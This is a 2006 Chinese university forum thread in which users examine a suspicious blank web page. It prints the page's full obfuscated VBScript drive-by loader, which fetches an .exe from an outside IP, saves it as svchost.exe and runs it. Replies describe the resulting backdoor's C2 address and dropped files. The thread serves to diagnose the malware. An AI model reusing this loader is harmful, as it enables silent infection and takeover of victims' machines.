碧海潮声大学生网

标题: 大家帮我看看这个有问题么 [打印本页]

作者: only 时间: 2006-10-23 15:05
标题: 大家帮我看看这个有问题么
大家帮我看看这个有问题么
1个网友让我打http://jslkwjslkw.id666.com/user/jslkwjslkw/disk/webdisk/xin.htm
我就打开了,发现1片空白,查看源码,发现
http://222.73.4.122/11.exe
可以下载,我下载后,卡巴斯基未报!
请各位帮我看看这个有无毒
谢谢

作者: starshow0571 时间: 2006-10-23 16:16
<html>
<title></title>
<script language="VBScript">
on error resume next
dl = "http://222.73.4.122/11.exe"
j1="clsid:"
j2="BD96C556-"
j3="65A3-"
j4="11D0-"
j5="983A-"
j6="00C04FC29E36"
j7=j1&j2&j3&j4&j5&j6
xx="object"
xxx="classid"
xxxx="Scripting.FileSystemObject"
dd="open"
Set df = document.createElement(xx)
df.setAttribute xxx, j7
b4="Mi"
b5="cr"
b6="o"
b7="soft"
b8=".X"
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb1=b4&b5&b6&b7&b8&b9
strb2=b10&b11&b12&b13&b14
strb=strb1&strb2
Set x = df.CreateObject(strb,"")
a4="A"
a5="d"
a6="o"
a7="d"
a8="b"
a9="."
a10="S"
a11="t"
a12="r"
a13="e"
a14="a"
a15="m"
strd1=a4&a5&a6&a7&a8&a9
strd2=a10&a11&a12&a13&a14&a15
strd=strd1&strd2
set SS = df.createobject(strd,"")
SS.type = 1
f4="G"
f5="E"
f6="T"
stre=f4&f5&f6
x.Open stre, dl, False
x.Send
marco1="svchost.exe"
set F = df.createobject(xxxx,"")
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.savetofile marco1,2
SS.close
z1="She"
z2="ll.A"
z3="ppli"
z4="cat"
z5="io"
z6="n"
zz=z1&z2&z3&z4&z5&z6
set Q = df.createobject(zz,"")
Q.ShellExecute marco1,"","",dd,0
</script>
<head>
<title></title>
</head><body>
</body></html>

作者: starshow0571 时间: 2006-10-23 16:17
[mop011] 是个网马吧！
你想让我们论坛里的人当肉鸡啊？ [s:33]

作者: only 时间: 2006-10-23 17:15
不知道是不是网马,从源码中能看出下载1个http://222.73.4.122/11.exe
我卡巴斯基未报....你们用其他软件检测下这个!

作者: 大麻哈鱼 时间: 2006-10-23 17:53
肥鸽子一只。
老家http://222.73.4.122/ip.txt
HKLM\SYSTEM\ControlSet?(?取决于HKLM\SYSTEM\Select下的current值)建立服务，服务名11.
生成%systemroot%\system32\qq.exe

作者: only 时间: 2006-10-23 20:27

引用第4楼大麻哈鱼于2006-10-23 17:53发表的“”:
肥鸽子一只。
老家http://222.73.4.122/ip.txt
HKLMSYSTEMControlSet?(?取决于HKLMSYSTEMSelect下的current值)建立服务，服务名11.
生成%systemroot%system32qq.exe

%systemroot%\system32\qq.exe
无qq.exe啊
我是不是中标了?
我靠前几天周扒皮中鸽子入侵惟一中鸽子,我靠!

作者: 我是誰 时间: 2006-10-23 21:11
我下了这个11.exe，毫不犹豫就双击了，NOD32没有报警。看了看system32，果然有QQ.exe
反正我是要重装系统的，嘿嘿。因为这个系统装SQL2005装坏了，不得不重装，但手头上有项目没完成，所以拖了几天。所以什么危险操作都敢做。哈。现在开始重装吧。

作者: only 时间: 2006-10-23 21:37
为什么我的
%systemroot%\system32\qq.exe
无qq.exe啊

作者: starshow0571 时间: 2006-10-24 10:56

引用第4楼大麻哈鱼于2006-10-23 17:53发表的“”:
肥鸽子一只。
老家http://222.73.4.122/ip.txt
HKLMSYSTEMControlSet?(?取决于HKLMSYSTEMSelect下的current值)建立服务，服务名11.
生成%systemroot%system32qq.exe

这位大哥蛮N的，呵呵！

作者: starshow0571 时间: 2006-10-24 10:58

引用第7楼only于2006-10-23 21:37发表的“”:
为什么我的
%systemroot%system32qq.exe
无qq.exe啊

也许是被隐藏了！！！！

作者: starshow0571 时间: 2006-10-24 10:59

引用第5楼only于2006-10-23 20:27发表的“”:

%systemroot%system32qq.exe
无qq.exe啊
我是不是中标了?
我靠前几天周扒皮中鸽子入侵惟一中鸽子,我靠!

靠！说我啊？MS这句话也是病句啊！
我可没搞过你啊！

作者: starshow0571 时间: 2006-10-24 11:06

引用第6楼我是誰于2006-10-23 21:11发表的“”:
我下了这个11.exe，毫不犹豫就双击了，NOD32没有报警。看了看system32，果然有QQ.exe
反正我是要重装系统的，嘿嘿。因为这个系统装SQL2005装坏了，不得不重装，但手头上有项目没完成，所以拖了几天。所以什么危险操作都敢做。哈。现在开始重装吧。

你好强，这么危险的操作都敢！不过我也敢啊，用学校的机子，反正是硬件还原的！呵呵！
重装啊？那还不如去还原了？

作者: 海院の水水 时间: 2006-10-24 14:58
偶也不怕在网吧 ```````````````` 偶巴不得搞死他

作者: 笨笨啊 时间: 2006-10-24 16:46
呵呵，这个运行有什么好怕的啊
开好regmon和filemon，监视一下他做过什么，嘿嘿

不过我的系统是影子的，再怎么厉害重启一下搞定

作者: fegor 时间: 2006-10-26 14:31
这个就是现在最流行的MS06014网马了。
有卡巴的都升级到6.0吧。
中了也不怕。6.0行为杀毒很牛比的。。。鸽子即使免杀了也过不了这关。。。。

作者: starshow0571 时间: 2006-10-26 18:08

引用第14楼fegor于2006-10-26 14:31发表的“”:
这个就是现在最流行的MS06014网马了。
有卡巴的都升级到6.0吧。
中了也不怕。6.0行为杀毒很牛比的。。。鸽子即使免杀了也过不了这关。。。。

不知道什么网马！
不顾哦我知道现在的MS06040网马早就过不了杀软了，MS楼上的说错了吧！
是MS06040吧！

作者: 蓝阳辉 时间: 2006-10-26 18:43

引用第13楼笨笨啊于2006-10-24 16:46发表的“”:
呵呵，这个运行有什么好怕的啊
开好regmon和filemon，监视一下他做过什么，嘿嘿

不过我的系统是影子的，再怎么厉害重启一下搞定

一般人都不会这个的。....

欢迎光临碧海潮声大学生网 (http://www.zjoubbs.com/)